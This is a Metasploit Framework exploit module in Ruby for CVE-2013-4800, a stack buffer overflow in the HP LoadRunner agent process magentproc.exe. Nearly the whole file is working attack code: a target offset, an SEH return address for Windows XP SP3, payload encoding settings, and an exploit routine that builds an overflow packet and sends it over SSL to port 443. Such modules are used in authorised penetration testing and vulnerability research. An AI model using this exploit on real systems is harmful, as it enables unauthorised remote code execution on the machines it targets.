### This file is part of the Metasploit Framework and may be subject to# redistribution and commercial restrictions. Please see the Metasploit# web site for more information on licensing and terms of use.# http://metasploit.com/##
require 'msf/core'class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,'Name' => 'HP LoadRunner magentproc.exe Overflow','Description'=> %q{
This module exploits a stack buffer overflow in HP LoadRunner before 11.52. The
vulnerability exists on the LoadRunner Agent Process magentproc.exe. By sending
a specially crafted packet, an attacker may be able to execute arbitrary code.},'Author' =>
['Unknown',# Original discovery # From Tenable Network Security'juan vazquez'# Metasploit module],'License'=> MSF_LICENSE,'References' =>
[['CVE','2013-4800'],['OSVDB','95644'],['http://www.zerodayinitiative.com/advisories/ZDI-13-169/']],'Privileged' => false,'DefaultOptions' =>
{'SSL' => true,'SSLVersion' => 'SSL3','PrependMigrate' => true
},'Payload'=>
{'Space'=> 4096,'DisableNops' => true,'BadChars' => "\x00",'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff"# Stack adjustment # add esp, -3500},'Platform' => 'win','DefaultTarget'=> 0,'Targets'=>
[['Windows XP SP3 / HP LoadRunner 11.50',{# magentproc.exe 11.50.2042.0'Offset' => 1104,'Ret' => 0x7ffc070e,# ppr # from NLS tables # Tested stable over Windows XP SP3 updates'Crash' => 6000 # Length needed to ensure an exception}]],'DisclosureDate' => 'Jul 27 2013'))
register_options([Opt::RPORT(443)], self.class)end
def exploit
req = [0xffffffff].pack("N")# Fake Length
req << rand_text(target['Offset'])
req << generate_seh_record(target.ret)
req << payload.encoded
req << rand_text(target['Crash'])
connect
print_status("Sending malicious request...")
sock.put(req)
disconnect
endend
